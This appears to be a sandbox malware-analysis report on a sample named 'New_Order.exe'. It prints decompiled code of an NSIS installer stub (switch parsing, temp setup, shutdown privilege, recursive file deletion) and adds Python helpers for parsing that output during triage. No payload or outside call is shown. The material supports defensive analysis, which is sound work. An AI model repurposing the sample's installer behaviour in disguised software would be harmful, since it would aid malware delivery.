                                                                        																_t94 = E00405796(0x429450);
                                                                        																if(_t94 != 0) {
                                                                        																	CloseHandle(_t94);
                                                                        																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                        																}
                                                                        															}
                                                                        															 *0x430400 =  *0x430400 + 1;
                                                                        															_t163 = _t163 - 1;
                                                                        														} while (_t163 != 0);
                                                                        														E00405ED6(_t137, _t157, 0);
                                                                        													}
                                                                        													goto L43;
                                                                        												}
                                                                        												 *_t153 = 0;
                                                                        												_t154 = _t153 + 4;
                                                                        												if(E00405B7D(_t182, _t153 + 4) == 0) {
                                                                        													goto L43;
                                                                        												}
                                                                        												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
                                                                        												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
                                                                        												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                        												goto L42;
                                                                        											}
                                                                        											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                                        											while( *_t153 != _t110) {
                                                                        												_t153 = _t153 - 1;
                                                                        												if(_t153 >= _t160) {
                                                                        													continue;
                                                                        												}
                                                                        												goto L39;
                                                                        											}
                                                                        											goto L39;
                                                                        										}
                                                                        										GetWindowsDirectoryA(_t157, 0x3fb);
                                                                        										lstrcatA(_t157, "\\Temp");
                                                                        										_t113 = E00403317(_t173);
                                                                        										_t174 = _t113;
                                                                        										if(_t113 != 0) {
                                                                        											goto L33;
                                                                        										}
                                                                        										GetTempPathA(0x3fc, _t157);
                                                                        										lstrcatA(_t157, "Low");
                                                                        										SetEnvironmentVariableA("TEMP", _t157);
                                                                        										SetEnvironmentVariableA("TMP", _t157);
                                                                        										_t118 = E00403317(_t174);
                                                                        										_t175 = _t118;
                                                                        										if(_t118 == 0) {
                                                                        											goto L43;
                                                                        										}
                                                                        										goto L33;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        								_t141 = _t55[4];
                                                                        								__eflags = _t141 - 0x20;
                                                                        								if(_t141 == 0x20) {
                                                                        									L23:
                                                                        									_t15 = _t164 + 0x20;
                                                                        									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                                        									__eflags =  *_t15;
                                                                        									goto L24;
                                                                        								}
                                                                        								__eflags = _t141;
                                                                        								if(_t141 != 0) {
                                                                        									goto L24;
                                                                        								}
                                                                        								goto L23;
                                                                        							}
                                                                        							_t142 = _t55[1];
                                                                        							__eflags = _t142 - 0x20;
                                                                        							if(_t142 == 0x20) {
                                                                        								L19:
                                                                        								 *0x42f4e0 = 1;
                                                                        								goto L20;
                                                                        							}
                                                                        							__eflags = _t142;
                                                                        							if(_t142 != 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							goto L19;
                                                                        						}
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        					do {
                                                                        						L12:
                                                                        						_t55 =  &(_t55[1]);
                                                                        						__eflags =  *_t55 - 0x20;
                                                                        					} while ( *_t55 == 0x20);
                                                                        					goto L13;
                                                                        				}
                                                                        				goto L30;
                                                                        			}
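The switch handling in the listing above (labels L12-L25, plus the backward scan for " _?=" in the branch guarded by the flag at 0x42f440) is the command-line parsing of the NSIS installer stub: tokens are split on spaces, a leading quote switches the delimiter to the closing quote, and a token starting with "/" is tested against 'S' (silent), the dword "NCRC" (skip CRC) and the dword " /D=" read two bytes before the current position (install directory, rest of line, must be last). The Python below is an added example, not code from the report or from the sample; it re-implements that logic on a string so a triager can see what a given command line would do to the stub. Assumed and labelled as such: the byte at 0x42f4e0 is the silent flag and the bit OR'd into the word at _t164+0x20 is the skip-CRC flag (the surrounding control flow supports both readings); the on-disk path check E00405B7D is not reproduced; the command lines in the test are constructed.

```python
"""Re-implementation of the command-line switch parsing in the decompiled
installer stub above.  Added example: not code from the report or the sample.
Switch names come from the constants the pseudocode compares against
("NCRC", " /D=", " _?=") and the 'S' check; the meaning of the two flags
(silent at 0x42f4e0, skip-CRC bit at _t164+0x20) is an assumption.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass
class StubArgs:
    silent: bool = False                    # "/S" followed by space or end of line
    skip_crc: bool = False                  # "/NCRC" followed by space or end of line
    install_dir: Optional[str] = None       # everything after " /D=" to end of line
    uninstall_target: Optional[str] = None  # everything after the LAST " _?="
    cmdline: str = ""                       # command line as left after truncation


def _find_char(s: str, pos: int, delim: str) -> int:
    """Equivalent of E00405ABA(ptr, delim): index of the next delim or end of string."""
    while pos < len(s) and s[pos] != delim:
        pos += 1
    return pos


def parse_stub_cmdline(cmdline: str, is_uninstaller: bool = False) -> StubArgs:
    """Walk the command line the way the stub does and report the switches it honours."""
    args = StubArgs()

    if is_uninstaller:
        # Uninstaller branch: scan backwards from the end for the last " _?=",
        # terminate the string there and take the remainder as the target path.
        # (The stub then validates that path on disk via E00405B7D; not reproduced.)
        idx = cmdline.rfind(" _?=")
        if idx != -1:
            args.uninstall_target = cmdline[idx + 4:]
            cmdline = cmdline[:idx]

    pos = 0
    while pos < len(cmdline):
        # L12: skip runs of spaces
        while pos < len(cmdline) and cmdline[pos] == " ":
            pos += 1
        if pos >= len(cmdline):
            break
        # L13: a leading quote makes the closing quote the token delimiter
        delim = " "
        if cmdline[pos] == '"':
            pos += 1
            delim = '"'
        if pos < len(cmdline) and cmdline[pos] == "/":
            pos += 1
            # 'S' must be followed by a space or end of line, so "/Silent" and a
            # quoted "/S" (next char is '"') do not count.
            if cmdline[pos:pos + 1] == "S" and cmdline[pos + 1:pos + 2] in ("", " "):
                args.silent = True
            if cmdline[pos:pos + 4] == "NCRC" and cmdline[pos + 4:pos + 5] in ("", " "):
                args.skip_crc = True
            # The dword is read at ptr-2, so "/D=" must be preceded by a space
            # (a quoted /D= never matches).  It takes the rest of the line,
            # spaces included, and the command line is truncated in front of it.
            if pos >= 2 and cmdline[pos - 2:pos + 2] == " /D=":
                args.install_dir = cmdline[pos + 2:]
                cmdline = cmdline[:pos - 2]
                break
        # L25: skip to the end of this token, then past a closing quote
        pos = _find_char(cmdline, pos, delim)
        if pos < len(cmdline) and cmdline[pos] == '"':
            pos += 1

    args.cmdline = cmdline
    return args


if __name__ == "__main__":
    # Constructed command line using the sample path seen in the listing.
    demo = r'"C:\Users\alfons\Desktop\New_Order.exe" /S /NCRC /D=C:\Program Files\My App'
    print(parse_stub_cmdline(demo))
```

Because the first token (the executable path) never starts with "/", it is consumed by the quote handling and skipped like any other non-switch token, which is why the parser can be fed the full command line rather than just the arguments.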

Instruction addresses for the listing above (shown beside each line in the report; extraction detached them into a separate column): 0x00403358 .. 0x0040382a
                                                                        0x00403627
                                                                        0x00403699
                                                                        0x0040369b
                                                                        0x004036a2
                                                                        0x004036aa
                                                                        0x004036aa
                                                                        0x004036b5
                                                                        0x004036ba
                                                                        0x004036c9
                                                                        0x004036cd
                                                                        0x004036ce
                                                                        0x004036d7
                                                                        0x004036d0
                                                                        0x004036d0
                                                                        0x004036d0
                                                                        0x004036dd
                                                                        0x004036e3
                                                                        0x004036e9
                                                                        0x004036f1
                                                                        0x004036f1
                                                                        0x004036ff
                                                                        0x00403704
                                                                        0x00403716
                                                                        0x0040371e
                                                                        0x00403724
                                                                        0x00403730
                                                                        0x00403736
                                                                        0x00403740
                                                                        0x00403756
                                                                        0x00403767
                                                                        0x0040376d
                                                                        0x00403774
                                                                        0x00403777
                                                                        0x0040377d
                                                                        0x0040377d
                                                                        0x00403774
                                                                        0x00403781
                                                                        0x00403787
                                                                        0x00403787
                                                                        0x0040378c
                                                                        0x0040378c
                                                                        0x00000000
                                                                        0x004036c9
                                                                        0x00403629
                                                                        0x0040362b
                                                                        0x00403636
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040363e
                                                                        0x00403649
                                                                        0x0040364e
                                                                        0x00000000
                                                                        0x0040364e
                                                                        0x00403612
                                                                        0x00403614
                                                                        0x00403618
                                                                        0x0040361b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040361b
                                                                        0x00000000
                                                                        0x00403614
                                                                        0x00403564
                                                                        0x00403570
                                                                        0x00403575
                                                                        0x0040357a
                                                                        0x0040357c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403584
                                                                        0x0040358c
                                                                        0x0040359d
                                                                        0x004035a5
                                                                        0x004035a7
                                                                        0x004035ac
                                                                        0x004035ae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004035ae
                                                                        0x00000000
                                                                        0x00403513
                                                                        0x004034d4
                                                                        0x004034d7
                                                                        0x004034da
                                                                        0x004034e0
                                                                        0x004034e0
                                                                        0x004034e0
                                                                        0x004034e0
                                                                        0x00000000
                                                                        0x004034e0
                                                                        0x004034dc
                                                                        0x004034de
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004034de
                                                                        0x0040348f
                                                                        0x00403492
                                                                        0x00403495
                                                                        0x0040349b
                                                                        0x0040349b
                                                                        0x00000000
                                                                        0x0040349b
                                                                        0x00403497
                                                                        0x00403499
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403499
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040346a
                                                                        0x0040346a
                                                                        0x0040346a
                                                                        0x0040346b
                                                                        0x0040346b
                                                                        0x00000000
                                                                        0x0040346a
                                                                        0x00000000

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE ref: 0040336D
                                                                        • GetVersion.KERNEL32 ref: 00403373
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                        • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                        • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                        • GetCommandLineA.KERNEL32(Lat Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\New_Order.exe" ,00000020,"C:\Users\user\Desktop\New_Order.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                        • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                          • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                          • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                          • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New_Order.exe" ,00000000), ref: 00403924
                                                                          • Part of subcall function 0040390A: lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
                                                                          • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                                          • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(GHFGHFGHFDGDFGDFg), ref: 00403A18
                                                                          • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                                                                          • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                                                                          • Part of subcall function 00403830: CloseHandle.KERNEL32(000002A0,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                        • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                        • ExitProcess.KERNEL32 ref: 00403688
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                        • ExitWindowsEx.USER32 ref: 00403807
                                                                        • ExitProcess.KERNEL32 ref: 0040382A
                                                                          • Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                                        • String ID: "$"C:\Users\user\Desktop\New_Order.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New_Order.exe$Error launching installer$Lat Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                        • API String ID: 1314998376-1048902453
                                                                        • Opcode ID: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                                        • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                        • Opcode Fuzzy Hash: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                                        • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                                        Uniqueness
                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
                                                                        				signed int _v8;
                                                                        				void* _v12;
                                                                        				signed int _v16;
                                                                        				struct _WIN32_FIND_DATAA _v336;
                                                                        				signed int _t40;
                                                                        				char* _t53;
                                                                        				signed int _t55;
                                                                        				signed int _t58;
                                                                        				signed int _t64;
                                                                        				signed int _t66;
                                                                        				void* _t68;
                                                                        				signed char _t69;
                                                                        				CHAR* _t71;
                                                                        				void* _t72;
                                                                        				CHAR* _t73;
                                                                        				char* _t76;
                                                                        
                                                                        				_t69 = _a8;
                                                                        				_t73 = _a4;
                                                                        				_v8 = _t69 & 0x00000004;
                                                                        				_t40 = E00405B7D(__eflags, _t73);
                                                                        				_v16 = _t40;
                                                                        				if((_t69 & 0x00000008) != 0) {
                                                                        					_t66 = DeleteFileA(_t73); // executed
                                                                        					asm("sbb eax, eax");
                                                                        					_t68 =  ~_t66 + 1;
                                                                        					 *0x42f4c8 =  *0x42f4c8 + _t68;
                                                                        					return _t68;
                                                                        				}
                                                                        				_a4 = _t69;
                                                                        				_t8 =  &_a4;
                                                                        				 *_t8 = _a4 & 0x00000001;
                                                                        				__eflags =  *_t8;
                                                                        				if( *_t8 == 0) {
                                                                        					L5:
                                                                        					E004060F7(0x42b898, _t73);
                                                                        					__eflags = _a4;
                                                                        					if(_a4 == 0) {
                                                                        						E00405AD6(_t73);
                                                                        					} else {
                                                                        						lstrcatA(0x42b898, "\*.*");
                                                                        					}
                                                                        					__eflags =  *_t73;
                                                                        					if( *_t73 != 0) {
                                                                        						L10:
                                                                        						lstrcatA(_t73, 0x40a014);
                                                                        						L11:
                                                                        						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                                        						_t40 = FindFirstFileA(0x42b898,  &_v336);
                                                                        						__eflags = _t40 - 0xffffffff;
                                                                        						_v12 = _t40;
                                                                        						if(_t40 == 0xffffffff) {
                                                                        							L29:
                                                                        							__eflags = _a4;
                                                                        							if(_a4 != 0) {
                                                                        								_t32 = _t71 - 1;
                                                                        								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                        								__eflags =  *_t32;
                                                                        							}
                                                                        							goto L31;
                                                                        						} else {
                                                                        							goto L12;
                                                                        						}
                                                                        						do {
                                                                        							L12:
                                                                        							_t76 =  &(_v336.cFileName);
                                                                        							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
                                                                        							__eflags =  *_t53;
                                                                        							if( *_t53 != 0) {
                                                                        								__eflags = _v336.cAlternateFileName;
                                                                        								if(_v336.cAlternateFileName != 0) {
                                                                        									_t76 =  &(_v336.cAlternateFileName);
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *_t76 - 0x2e;
                                                                        							if( *_t76 != 0x2e) {
                                                                        								L19:
                                                                        								E004060F7(_t71, _t76);
                                                                        								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                        								if(__eflags == 0) {
                                                                        									_t55 = E00405877(__eflags, _t73, _v8);
                                                                        									__eflags = _t55;
                                                                        									if(_t55 != 0) {
                                                                        										E0040521E(0xfffffff2, _t73);
                                                                        									} else {
                                                                        										__eflags = _v8 - _t55;
                                                                        										if(_v8 == _t55) {
                                                                        											 *0x42f4c8 =  *0x42f4c8 + 1;
                                                                        										} else {
                                                                        											E0040521E(0xfffffff1, _t73);
                                                                        											E00405ED6(_t72, _t73, 0);
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = (_a8 & 0x00000003) - 3;
                                                                        									if(__eflags == 0) {
                                                                        										E004058BF(__eflags, _t73, _a8);
                                                                        									}
                                                                        								}
                                                                        								goto L27;
                                                                        							}
                                                                        							_t64 =  *((intOrPtr*)(_t76 + 1)); // second byte of the name under test; the two checks below are the usual skip of "." and ".." (reading of the decompiled control flow, not a label from the report)
                                                                        							__eflags = _t64;
                                                                        							if(_t64 == 0) {
                                                                        								goto L27; // ".": nothing to do, fetch the next entry
                                                                        							}
                                                                        							__eflags = _t64 - 0x2e;
                                                                        							if(_t64 != 0x2e) {
                                                                        								goto L19; // a real entry name: process it
                                                                        							}
                                                                        							__eflags =  *((char*)(_t76 + 2));
                                                                        							if( *((char*)(_t76 + 2)) == 0) {
                                                                        								goto L27; // "..": skip it
                                                                        							}
                                                                        							goto L19;
                                                                        							L27:
                                                                        							_t58 = FindNextFileA(_v12,  &_v336); // _v12: search handle from FindFirstFileA above, _v336: WIN32_FIND_DATAA buffer
                                                                        							__eflags = _t58;
                                                                        						} while (_t58 != 0); // until the enumeration is exhausted
                                                                        						_t40 = FindClose(_v12);
                                                                        						goto L29;
                                                                        					}
                                                                        					__eflags =  *0x42b898 - 0x5c;
                                                                        					if( *0x42b898 != 0x5c) {
                                                                        						goto L11;
                                                                        					}
                                                                        					goto L10;
                                                                        				} else {
                                                                        					__eflags = _t40;
                                                                        					if(_t40 == 0) {
                                                                        						L31:
                                                                        						__eflags = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L39:
                                                                        							return _t40;
                                                                        						}
                                                                        						__eflags = _v16;
                                                                        						if(_v16 != 0) {
                                                                        							_t40 = E0040646B(_t73);
                                                                        							__eflags = _t40;
                                                                        							if(_t40 == 0) {
                                                                        								goto L39;
                                                                        							}
                                                                        							E00405A8F(_t73);
                                                                        							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
                                                                        							__eflags = _t40;
                                                                        							if(_t40 != 0) {
                                                                        								return E0040521E(0xffffffe5, _t73);
                                                                        							}
                                                                        							__eflags = _v8;
                                                                        							if(_v8 == 0) {
                                                                        								goto L33;
                                                                        							}
                                                                        							E0040521E(0xfffffff1, _t73);
                                                                        							return E00405ED6(_t72, _t73, 0);
                                                                        						}
                                                                        						L33:
                                                                        						 *0x42f4c8 =  *0x42f4c8 + 1;
                                                                        						return _t40;
                                                                        					}
                                                                        					__eflags = _t69 & 0x00000002;
                                                                        					if((_t69 & 0x00000002) == 0) {
                                                                        						goto L31;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • DeleteFileA.KERNELBASE(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                        • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                        • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                        • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                        Strings
                                                                        • \*.*, xrefs: 0040592A
                                                                        • "C:\Users\user\Desktop\New_Order.exe" , xrefs: 004058BF
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-1601413275
                                                                        • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                        • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                        • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                        • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
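The "APIs" and "Strings" records above are the part of such a listing a triager actually reads: they give the resolved import, the module it resolved in (KERNEL32 versus KERNELBASE), the stack slots the tracer captured, and the address of the call. The Python below is an added editorial example, not part of the sandbox report or of the sample, that parses those two record types into structured data and derives the triage facts for this function (directory enumeration with `\*.*`, file deletion, the literal paths involved, the address span of the calls). It assumes only the line format visible on this page (`• Func.Module(args), ref: ADDR` and `• text, xrefs: ADDR`); the fixture strings are the seven API lines and three Strings lines copied from the listing above, and the function and class names are the example's own.

```python
"""Parse the "APIs" and "Strings" records of a sandbox decompilation
listing (the format shown on this page) into structured data for triage."""
import re
from dataclasses import dataclass

# Constructed fixture: the APIs lines of the E004058BF listing above, copied
# from the page. Raw string so the Windows paths keep their backslashes.
SAMPLE_API_LINES = r"""
• DeleteFileA.KERNELBASE(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
• lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
• lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
• lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
• FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
• FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
• FindClose.KERNEL32(00000000), ref: 00405A26
"""

# Constructed fixture: the Strings lines of the same listing.
SAMPLE_STRING_LINES = r"""
• \*.*, xrefs: 0040592A
• "C:\Users\user\Desktop\New_Order.exe" , xrefs: 004058BF
• C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
"""

API_RE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_RE = re.compile(r"^\s*•?\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)\s*$")
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class ApiCall:
    func: str      # exported name, e.g. FindFirstFileA
    module: str    # module the call resolved in as the tracer saw it
    args: tuple    # stack slots as printed; '?' means the tracer could not resolve one
    ref: int       # address of the call instruction inside the sample


@dataclass(frozen=True)
class StringRef:
    text: str      # kept exactly as printed, trailing space included
    xref: int


def classify_arg(arg: str) -> str:
    """Bucket a printed slot: unresolved ('?'), 32-bit hex value, or literal string."""
    if arg == "?":
        return "unknown"
    if HEX32_RE.match(arg):
        return "hex"
    return "string"


def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue  # blank line or not an API record
        args = tuple(m.group("args").split(",")) if m.group("args") else ()
        calls.append(ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def parse_string_lines(text: str) -> list:
    refs = []
    for line in text.splitlines():
        m = STRING_RE.match(line)
        if m:
            refs.append(StringRef(m.group("text"), int(m.group("ref"), 16)))
    return refs


def literal_string_args(calls) -> set:
    """Every slot the tracer printed as a literal string (paths, wildcards)."""
    return {a for c in calls for a in c.args if classify_arg(a) == "string"}


def summarize(calls, strings) -> dict:
    """Triage facts for one listing: directory walk, file deletion, literal
    paths/patterns, and the address span covered by the captured calls."""
    funcs = {c.func for c in calls}
    return {
        "enumerates_directory": {"FindFirstFileA", "FindNextFileA", "FindClose"} <= funcs,
        "deletes_files": "DeleteFileA" in funcs,
        "literal_args": sorted(literal_string_args(calls)),
        "string_xrefs": sorted(s.text for s in strings),
        "first_ref": min(c.ref for c in calls),
        "last_ref": max(c.ref for c in calls),
    }


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    strings = parse_string_lines(SAMPLE_STRING_LINES)
    for c in sorted(calls, key=lambda c: c.ref):
        print(f"{c.ref:08x} {c.module}!{c.func} ({len(c.args)} slots)")
    print(summarize(calls, strings))
```

One caveat when reading the argument columns: the tracer prints a fixed run of stack slots, not the API's declared parameter list. DeleteFileA takes a single parameter and FindClose takes one, yet the record for DeleteFileA shows five slots, so everything past the real parameter count is caller-frame content (return addresses, locals such as the Temp path). Treat a literal that appears in a late slot as evidence about the caller, not as the API's own argument.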

                                                                        C-Code - Quality: 100%
                                                                        			E0040646B(CHAR* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				// Existence probe: FindFirstFileA fills the static WIN32_FIND_DATAA at 0x42c0e0 for the path in _a4
                                                                        				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
                                                                        				if(_t2 == 0xffffffff) { // INVALID_HANDLE_VALUE: no such file or directory
                                                                        					return 0;
                                                                        				}
                                                                        				FindClose(_t2); // the handle is never used to enumerate; only the first result matters
                                                                        				return 0x42c0e0; // non-zero (pointer to the find data) means the path exists; callers test it for 0
                                                                        			}

                                                                        APIs
